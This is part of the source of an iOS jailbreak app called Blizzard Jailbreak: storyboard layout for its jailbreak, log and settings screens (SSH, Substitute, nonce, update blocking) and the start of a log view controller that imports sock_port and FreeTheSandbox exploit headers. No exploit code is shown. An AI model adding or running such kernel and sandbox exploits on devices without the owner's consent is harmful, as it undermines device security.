<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="BLIZZARD JAILBREAK" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontForContentSizeCategory="YES" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="fV6-tC-CJz">
<rect key="frame" x="30" y="190" width="260" height="29"/>
<constraints>
<constraint firstAttribute="height" constant="29" id="ZrZ-fC-3IJ"/>
</constraints>
<fontDescription key="fontDescription" type="system" weight="light" pointSize="24"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<button opaque="NO" alpha="0.84999999999999998" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="ZQt-HB-KcQ">
<rect key="frame" x="40" y="260" width="240" height="48"/>
<constraints>
<constraint firstAttribute="height" constant="48" id="n5b-aE-1UC"/>
</constraints>
<fontDescription key="fontDescription" name="HelveticaNeue-Light" family="Helvetica Neue" pointSize="18"/>
<state key="normal" title="JAILBREAK" backgroundImage="button_mask">
<color key="titleColor" cocoaTouchSystemColor="darkTextColor"/>
</state>
<userDefinedRuntimeAttributes>
<userDefinedRuntimeAttribute type="number" keyPath="layer.cornerRadius">
<integer key="value" value="20"/>
</userDefinedRuntimeAttribute>
<userDefinedRuntimeAttribute type="boolean" keyPath="clipsToBounds" value="YES"/>
</userDefinedRuntimeAttributes>
<variation key="heightClass=regular-widthClass=regular">
<fontDescription key="fontDescription" name="HelveticaNeue-Light" family="Helvetica Neue" pointSize="18"/>
</variation>
<connections>
<action selector="blizzardInit:" destination="BYZ-38-t0r" eventType="touchUpInside" id="Jh7-HL-oQs"/>
</connections>
</button>
<button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="Lg7-ka-Z5I">
<rect key="frame" x="103" y="329.5" width="114" height="38"/>
<constraints>
<constraint firstAttribute="height" constant="38" id="AWs-yW-e2p"/>
</constraints>
<state key="normal" title="Settings" backgroundImage="button_mask">
<color key="titleColor" red="0.059621539360000003" green="0.12937427879999999" blue="0.23696567360000001" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
</state>
<userDefinedRuntimeAttributes>
<userDefinedRuntimeAttribute type="number" keyPath="layer.cornerRadius">
<integer key="value" value="20"/>
</userDefinedRuntimeAttribute>
<userDefinedRuntimeAttribute type="boolean" keyPath="clipsToBounds" value="YES"/>
</userDefinedRuntimeAttributes>
<connections>
<action selector="injectSettingsUI:" destination="BYZ-38-t0r" eventType="touchUpInside" id="1dX-EC-0pA"/>
</connections>
</button>
</subviews>
<color key="backgroundColor" red="1" green="1" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<constraints>
<constraint firstItem="fV6-tC-CJz" firstAttribute="top" secondItem="Suw-j9-Sy3" secondAttribute="bottom" constant="6" id="3Xc-Yf-VaY"/>
<constraint firstItem="IMk-rn-peb" firstAttribute="trailing" secondItem="6Tk-OE-BBY" secondAttribute="trailing" id="5Rf-lp-HFr"/>
<constraint firstItem="ZQt-HB-KcQ" firstAttribute="top" secondItem="Suw-j9-Sy3" secondAttribute="bottom" constant="76" id="8VU-CU-HbD"/>
<constraint firstItem="ZQt-HB-KcQ" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="40" id="CEp-oy-DxF"/>
<constraint firstItem="IMk-rn-peb" firstAttribute="top" secondItem="8bC-Xf-vdC" secondAttribute="top" id="COe-Os-yxH"/>
<constraint firstItem="fV6-tC-CJz" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="30" id="Cdz-ud-Ycy"/>
<constraint firstItem="Lg7-ka-Z5I" firstAttribute="top" secondItem="ZQt-HB-KcQ" secondAttribute="bottom" constant="21.5" id="CvP-Ok-6ZK"/>
<constraint firstItem="Suw-j9-Sy3" firstAttribute="centerY" secondItem="8bC-Xf-vdC" secondAttribute="centerY" constant="-175" id="HOt-q2-t22"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="ZQt-HB-KcQ" secondAttribute="trailing" constant="40" id="SSW-cU-K2f"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="bottom" secondItem="2nt-NA-u5V" secondAttribute="bottom" constant="20" id="TkI-sm-9oq"/>
<constraint firstItem="ZQt-HB-KcQ" firstAttribute="centerY" secondItem="8bC-Xf-vdC" secondAttribute="centerY" id="WqY-g3-Csa"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="fV6-tC-CJz" secondAttribute="trailing" constant="30" id="Wxw-hN-w3e"/>
<constraint firstItem="Suw-j9-Sy3" firstAttribute="centerX" secondItem="8bC-Xf-vdC" secondAttribute="centerX" id="aLV-fL-jbw"/>
<constraint firstAttribute="bottom" secondItem="IMk-rn-peb" secondAttribute="bottom" constant="-34" id="abB-9D-Xd3"/>
<constraint firstItem="2nt-NA-u5V" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="30" id="eGu-pX-zhC"/>
<constraint firstItem="Lg7-ka-Z5I" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="103" id="pYK-Pg-NCr"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="Lg7-ka-Z5I" secondAttribute="trailing" constant="103" id="tr5-08-hBA"/>
<constraint firstItem="IMk-rn-peb" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" id="uRA-zq-YiX"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="2nt-NA-u5V" secondAttribute="trailing" constant="30" id="wiI-AC-2N6"/>
<constraint firstItem="ZQt-HB-KcQ" firstAttribute="centerX" secondItem="8bC-Xf-vdC" secondAttribute="centerX" id="yPD-m1-UWo"/>
</constraints>
<viewLayoutGuide key="safeArea" id="6Tk-OE-BBY"/>
</view>
<connections>
<outlet property="blizzardInit" destination="ZQt-HB-KcQ" id="TU9-7F-pmQ"/>
<segue destination="1cP-8T-Syx" kind="modal" identifier="vc" modalPresentationStyle="fullScreen" modalTransitionStyle="coverVertical" id="5ML-c8-fwh"/>
<segue destination="ccD-bF-PLb" kind="showDetail" identifier="settingsView" id="IJs-qc-Ey8"/>
</connections>
</viewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="dkx-z0-nzr" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="-9.375" y="132.04225352112675"/>
</scene>
<!--Jailbreaking-->
<scene sceneID="Urq-5U-iiU">
<objects>
<viewController storyboardIdentifier="vc" title="Jailbreaking" modalPresentationStyle="pageSheet" useStoryboardIdentifierAsRestorationIdentifier="YES" id="1cP-8T-Syx" customClass="BlizzardLog" sceneMemberID="viewController">
<view key="view" contentMode="scaleToFill" id="m8P-iR-Ifq">
<rect key="frame" x="0.0" y="0.0" width="320" height="568"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<subviews>
<textView clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="scaleToFill" indicatorStyle="white" keyboardDismissMode="interactive" editable="NO" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="fte-IW-BJz">
<rect key="frame" x="0.0" y="20" width="320" height="466"/>
<color key="backgroundColor" red="0.059621539360000003" green="0.12937427879999999" blue="0.23696567360000001" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<fontDescription key="fontDescription" name="Avenir-Book" family="Avenir" pointSize="14"/>
<textInputTraits key="textInputTraits" autocapitalizationType="sentences"/>
</textView>
<button opaque="NO" alpha="0.69999999999999996" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="6gp-uK-PGB">
<rect key="frame" x="30" y="494" width="260" height="54"/>
<constraints>
<constraint firstAttribute="height" constant="54" id="yAp-AT-6Rb"/>
</constraints>
<fontDescription key="fontDescription" name="HelveticaNeue-Light" family="Helvetica Neue" pointSize="18"/>
<state key="normal" title="Dismiss Jailbreak Log" backgroundImage="button_mask">
<color key="titleColor" cocoaTouchSystemColor="darkTextColor"/>
</state>
<userDefinedRuntimeAttributes>
<userDefinedRuntimeAttribute type="number" keyPath="layer.cornerRadius">
<integer key="value" value="20"/>
</userDefinedRuntimeAttribute>
<userDefinedRuntimeAttribute type="boolean" keyPath="clipsToBounds" value="YES"/>
</userDefinedRuntimeAttributes>
<variation key="heightClass=regular-widthClass=regular">
<fontDescription key="fontDescription" name="HelveticaNeue-Light" family="Helvetica Neue" pointSize="18"/>
</variation>
<connections>
<action selector="blizzardInit:" destination="BYZ-38-t0r" eventType="touchUpInside" id="Glp-ZU-t1C"/>
<action selector="dismissLogWindow:" destination="1cP-8T-Syx" eventType="touchUpInside" id="mdK-Eu-11O"/>
</connections>
</button>
<imageView userInteractionEnabled="NO" alpha="0.02" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="winter" translatesAutoresizingMaskIntoConstraints="NO" id="ZQT-Zx-TGV">
<rect key="frame" x="32" y="156" width="256" height="256"/>
</imageView>
</subviews>
<color key="backgroundColor" red="0.059621539360400544" green="0.12937427881651739" blue="0.23696567357512954" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="tintColor" white="0.0" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<constraints>
<constraint firstItem="ZQT-Zx-TGV" firstAttribute="centerX" secondItem="m8P-iR-Ifq" secondAttribute="centerX" id="6QC-jo-CBx"/>
<constraint firstItem="Svv-JT-Cgl" firstAttribute="trailing" secondItem="6gp-uK-PGB" secondAttribute="trailing" constant="30" id="A4t-gI-UZG"/>
<constraint firstItem="fte-IW-BJz" firstAttribute="trailing" secondItem="Svv-JT-Cgl" secondAttribute="trailing" id="BnC-xG-BEL"/>
<constraint firstItem="fte-IW-BJz" firstAttribute="centerX" secondItem="m8P-iR-Ifq" secondAttribute="centerX" id="De6-Ez-cWn"/>
<constraint firstItem="6gp-uK-PGB" firstAttribute="leading" secondItem="Svv-JT-Cgl" secondAttribute="leading" constant="30" id="K10-i5-DpT"/>
<constraint firstItem="Svv-JT-Cgl" firstAttribute="bottom" secondItem="6gp-uK-PGB" secondAttribute="bottom" constant="20" id="LQ4-mI-vaj"/>
<constraint firstItem="ZQT-Zx-TGV" firstAttribute="centerY" secondItem="m8P-iR-Ifq" secondAttribute="centerY" id="Nca-Bv-pGg"/>
<constraint firstItem="fte-IW-BJz" firstAttribute="leading" secondItem="Svv-JT-Cgl" secondAttribute="leading" id="SMt-1M-7FG"/>
<constraint firstItem="6gp-uK-PGB" firstAttribute="top" secondItem="fte-IW-BJz" secondAttribute="bottom" constant="8" id="fU8-e9-6aP"/>
<constraint firstItem="fte-IW-BJz" firstAttribute="top" secondItem="Svv-JT-Cgl" secondAttribute="top" id="qMd-od-gY8"/>
</constraints>
<viewLayoutGuide key="safeArea" id="Svv-JT-Cgl"/>
</view>
<connections>
<outlet property="dismissLog" destination="6gp-uK-PGB" id="JaG-sa-OQZ"/>
<outlet property="uiLogView" destination="fte-IW-BJz" id="fyt-x8-grl"/>
</connections>
</viewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="yZA-KH-vhq" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="732" y="132"/>
</scene>
<!--Blizzard View-->
<scene sceneID="MPx-FZ-cTW">
<objects>
<viewController id="ccD-bF-PLb" customClass="blizzardView" sceneMemberID="viewController">
<view key="view" contentMode="scaleToFill" id="e5t-i2-8ZF">
<rect key="frame" x="0.0" y="0.0" width="320" height="568"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<subviews>
<imageView userInteractionEnabled="NO" alpha="0.019999999552965164" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="winter" translatesAutoresizingMaskIntoConstraints="NO" id="pjT-vc-P8o">
<rect key="frame" x="32" y="156" width="256" height="256"/>
</imageView>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="BLIZZARD JAILBREAK" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="BNm-0w-E3T">
<rect key="frame" x="38" y="27" width="244" height="30"/>
<constraints>
<constraint firstAttribute="height" constant="30" id="8h3-rS-OsF"/>
</constraints>
<fontDescription key="fontDescription" type="system" pointSize="25"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Enable SSH" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="LlD-Gd-k5x">
<rect key="frame" x="16" y="76" width="100" height="23"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="Lo2-8G-vdS">
<rect key="frame" x="253" y="71" width="51" height="31"/>
<color key="onTintColor" red="0.72446093024843261" green="0.64574749504835438" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="thumbTintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
</switch>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Enable Substitute" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="F44-ZB-bbA">
<rect key="frame" x="16" y="115" width="150" height="23"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="c6c-Vb-Re1">
<rect key="frame" x="253" y="110" width="51" height="31"/>
<color key="onTintColor" red="0.72446093020000002" green="0.64574749499999995" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="thumbTintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
</switch>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Provision as Development" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="YV7-ks-D53">
<rect key="frame" x="16" y="154" width="220" height="23"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="X8I-y7-WsC">
<rect key="frame" x="253" y="149" width="51" height="31"/>
<color key="onTintColor" red="0.72446093020000002" green="0.64574749499999995" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="thumbTintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
</switch>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Block iOS Updates" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="yAE-R0-Bul">
<rect key="frame" x="16" y="193" width="159" height="23"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="oAF-uh-bO8">
<rect key="frame" x="253" y="188" width="51" height="31"/>
<color key="onTintColor" red="0.72446093020000002" green="0.64574749499999995" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="thumbTintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
</switch>
<button opaque="NO" alpha="0.84999999999999998" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="mh9-gl-or8">
<rect key="frame" x="69" y="314" width="181" height="40"/>
<constraints>
<constraint firstAttribute="height" constant="40" id="50J-ds-OGx"/>
</constraints>
<fontDescription key="fontDescription" type="system" weight="semibold" pointSize="17"/>
<state key="normal" title="Uninstall Blizzard" backgroundImage="button_mask">
<color key="titleColor" red="0.66965128490215986" green="0.59689297479878445" blue="0.92434423575129532" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
</state>
<userDefinedRuntimeAttributes>
<userDefinedRuntimeAttribute type="number" keyPath="layer.cornerRadius">
<integer key="value" value="20"/>
</userDefinedRuntimeAttribute>
<userDefinedRuntimeAttribute type="boolean" keyPath="clipsToBounds" value="YES"/>
</userDefinedRuntimeAttributes>
</button>
<button opaque="NO" alpha="0.84999999999999998" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="ynI-kc-Znh">
<rect key="frame" x="16" y="506" width="286" height="42"/>
<constraints>
<constraint firstAttribute="height" constant="42" id="ivX-Ua-KWg"/>
</constraints>
<state key="normal" title="SAVE SETTINGS" backgroundImage="button_mask">
<color key="titleColor" red="0.059621539360000003" green="0.12937427879999999" blue="0.23696567360000001" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
</state>
<userDefinedRuntimeAttributes>
<userDefinedRuntimeAttribute type="number" keyPath="layer.cornerRadius">
<integer key="value" value="20"/>
</userDefinedRuntimeAttribute>
<userDefinedRuntimeAttribute type="boolean" keyPath="clipsToBounds" value="YES"/>
</userDefinedRuntimeAttributes>
<connections>
<action selector="saveJailbreakSettings:" destination="ccD-bF-PLb" eventType="touchUpInside" id="pUi-Ou-cLm"/>
</connections>
</button>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Set Nonce" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="sFS-xy-61l">
<rect key="frame" x="16" y="232" width="101" height="23"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<textField opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" text="0x1111111111111111" borderStyle="roundedRect" placeholder="0x1111111111111111" clearsOnBeginEditing="YES" adjustsFontForContentSizeCategory="YES" minimumFontSize="17" clearButtonMode="whileEditing" translatesAutoresizingMaskIntoConstraints="NO" id="OjN-ig-hZR">
<rect key="frame" x="133" y="228" width="169" height="30"/>
<color key="backgroundColor" red="0.079355003360750492" green="0.17626018463250789" blue="0.31915884067357514" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="tintColor" red="0.72446093020000002" green="0.64574749499999995" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<constraints>
<constraint firstAttribute="width" secondItem="OjN-ig-hZR" secondAttribute="height" multiplier="169:30" id="0NE-MG-rri"/>
<constraint firstAttribute="height" constant="30" id="U5F-Qb-Cgv"/>
<constraint firstAttribute="width" constant="169" id="Xw3-QH-HKY"/>
</constraints>
<color key="textColor" red="0.72446093020000002" green="0.64574749499999995" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<textInputTraits key="textInputTraits" autocorrectionType="no" spellCheckingType="no" keyboardAppearance="alert" returnKeyType="continue" smartDashesType="no" smartInsertDeleteType="no" smartQuotesType="no" textContentType="name"/>
</textField>
</subviews>
<color key="backgroundColor" red="0.059621539360000003" green="0.12937427879999999" blue="0.23696567360000001" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<constraints>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="X8I-y7-WsC" secondAttribute="trailing" constant="18" id="3b3-3L-gMM"/>
<constraint firstItem="ynI-kc-Znh" firstAttribute="top" secondItem="mh9-gl-or8" secondAttribute="bottom" constant="152" id="8qF-Xl-0lj"/>
<constraint firstItem="Lo2-8G-vdS" firstAttribute="top" secondItem="BNm-0w-E3T" secondAttribute="bottom" constant="14" id="8xL-VB-xgI"/>
<constraint firstItem="sFS-xy-61l" firstAttribute="top" secondItem="yAE-R0-Bul" secondAttribute="bottom" constant="16" id="9mb-zn-H5i"/>
<constraint firstItem="oAF-uh-bO8" firstAttribute="top" secondItem="X8I-y7-WsC" secondAttribute="bottom" constant="8" id="AiU-6Y-ndB"/>
<constraint firstItem="F44-ZB-bbA" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="BlI-uK-tQW"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="mh9-gl-or8" secondAttribute="trailing" constant="70" id="F5Q-vD-G6G"/>
<constraint firstItem="mh9-gl-or8" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="69" id="HQ9-ub-NTG"/>
<constraint firstItem="BNm-0w-E3T" firstAttribute="top" secondItem="nFT-lw-eC5" secondAttribute="top" constant="7" id="HYO-e7-J4F"/>
<constraint firstItem="X8I-y7-WsC" firstAttribute="top" secondItem="c6c-Vb-Re1" secondAttribute="bottom" constant="8" id="M7T-X5-e9J"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="Lo2-8G-vdS" secondAttribute="trailing" constant="18" id="MmP-dg-hOy"/>
<constraint firstItem="yAE-R0-Bul" firstAttribute="top" secondItem="YV7-ks-D53" secondAttribute="bottom" constant="16" id="Pak-Wy-onw"/>
<constraint firstItem="c6c-Vb-Re1" firstAttribute="top" secondItem="Lo2-8G-vdS" secondAttribute="bottom" constant="8" id="R7Q-9U-1yE"/>
<constraint firstItem="pjT-vc-P8o" firstAttribute="centerY" secondItem="e5t-i2-8ZF" secondAttribute="centerY" id="RI6-NN-Fuy"/>
<constraint firstItem="F44-ZB-bbA" firstAttribute="top" secondItem="LlD-Gd-k5x" secondAttribute="bottom" constant="16" id="V4Q-g2-DPJ"/>
<constraint firstItem="YV7-ks-D53" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="WU9-Ef-nNM"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="c6c-Vb-Re1" secondAttribute="trailing" constant="18" id="Xvz-po-bDZ"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="BNm-0w-E3T" secondAttribute="trailing" constant="38" id="ZTm-lu-vPV"/>
<constraint firstItem="LlD-Gd-k5x" firstAttribute="top" secondItem="BNm-0w-E3T" secondAttribute="bottom" constant="19" id="bKt-TL-c21"/>
<constraint firstItem="BNm-0w-E3T" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="38" id="ccu-3H-g5F"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="bottom" secondItem="ynI-kc-Znh" secondAttribute="bottom" constant="20" id="ce6-iL-T9Y"/>
<constraint firstItem="LlD-Gd-k5x" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="dAW-mp-db8"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="ynI-kc-Znh" secondAttribute="trailing" constant="18" id="hWi-aQ-jY0"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="oAF-uh-bO8" secondAttribute="trailing" constant="18" id="i23-en-Q48"/>
<constraint firstItem="ynI-kc-Znh" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="kNS-Na-G9j"/>
<constraint firstItem="YV7-ks-D53" firstAttribute="top" secondItem="F44-ZB-bbA" secondAttribute="bottom" constant="16" id="kiI-Iu-4Wc"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="OjN-ig-hZR" secondAttribute="trailing" constant="18" id="kqV-G0-UgE"/>
<constraint firstItem="pjT-vc-P8o" firstAttribute="centerX" secondItem="e5t-i2-8ZF" secondAttribute="centerX" id="oSw-oR-gxE"/>
<constraint firstItem="OjN-ig-hZR" firstAttribute="leading" secondItem="sFS-xy-61l" secondAttribute="trailing" constant="16" id="sgx-bn-FSg"/>
<constraint firstItem="OjN-ig-hZR" firstAttribute="top" secondItem="oAF-uh-bO8" secondAttribute="bottom" constant="9" id="uJ3-Jc-0s7"/>
<constraint firstItem="yAE-R0-Bul" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="wZz-NQ-Cuj"/>
<constraint firstItem="sFS-xy-61l" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="zKT-na-bU3"/>
</constraints>
<viewLayoutGuide key="safeArea" id="nFT-lw-eC5"/>
</view>
<connections>
<outlet property="nonceField" destination="OjN-ig-hZR" id="Y5S-dg-ivX"/>
</connections>
</viewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="5aV-ZD-Tsj" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="1493.5999999999999" y="-249.62518740629687"/>
</scene>
</scenes>
<resources>
<image name="button_mask" width="100" height="100"/>
<image name="jailbreak_wallpaper" width="834" height="1194"/>
<image name="winter" width="256" height="256"/>
</resources>
</document>
================================================
FILE: Blizzard Jailbreak/BlizzardLog.h
================================================
//
// BlizzardLog.h
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#import <UIKit/UIKit.h>
NS_ASSUME_NONNULL_BEGIN
// View controller that shows the tool's stdout in a text view and drives the run
// from viewDidLoad (see BlizzardLog.m).
@interface BlizzardLog : UIViewController
// Button whose title BlizzardLog.m switches to "REBOOT DEVICE" when a reboot is required.
@property (weak, nonatomic) IBOutlet UIButton *dismissLog;
// Text view that receives everything written to stdout once redirection is active.
@property (weak, nonatomic) IBOutlet UITextView *uiLogView;
// Returns the file-scope BlizzLogger pointer from BlizzardLog.m.
// NOTE(review): BlizzardLog.m never assigns that pointer, so this returns nil even
// though the declaration sits inside NS_ASSUME_NONNULL - confirm the intended owner.
+ (instancetype)BlizzLogger;
// NOTE(review): the @implementation in BlizzardLog.m defines neither of the two methods
// below; unless a category supplies them, sending either selector raises
// "unrecognized selector" - confirm or remove.
- (void)displaySnapshotNotice;
- (void)customizeBtnAtUI;
@end
NS_ASSUME_NONNULL_END
================================================
FILE: Blizzard Jailbreak/BlizzardLog.m
================================================
//
// BlizzardLog.m
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#import "BlizzardLog.h"
#import "../Kernel Utilities/system_reboot.h"
#import "../Exploits/sock_port/exploit.h"
#import "../Blizzard Jailbreak/blizzardJailbreak.h"
#import "../APFS Utilities/rootfs_remount.h"
#import "../Exploits/FreeTheSandbox/freethesandbox.h"
// True when the running iOS version is less than or equal to v (numeric comparison);
// v must be a C string literal because the macro prefixes it with @.
#define currentVer(v) ([[[UIDevice currentDevice] systemVersion] compare:@v options:NSNumericSearch] != NSOrderedDescending)
// Empty class extension: no private properties or methods are declared.
@interface BlizzardLog()
@end
// Backing pointer for +BlizzLogger. Nothing in this file assigns it.
static BlizzardLog *BlizzLogger;
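@implementation BlizzardLog

// Returns the file-scope BlizzLogger pointer.
// NOTE(review): nothing in this file assigns BlizzLogger, so this returns nil although
// the header declares the result inside NS_ASSUME_NONNULL - confirm where the shared
// instance is supposed to be set.
+ (instancetype)BlizzLogger {
    return BlizzLogger;
}

// Selects what the dismiss button does: 0 closes the log view, 1 shows the reboot alert.
int dismissButtonActionType = 0;
// When 1, viewDidLoad leaves stdout alone instead of redirecting it into the log view.
int IS_BLIZZARD_DEBUG = 0;
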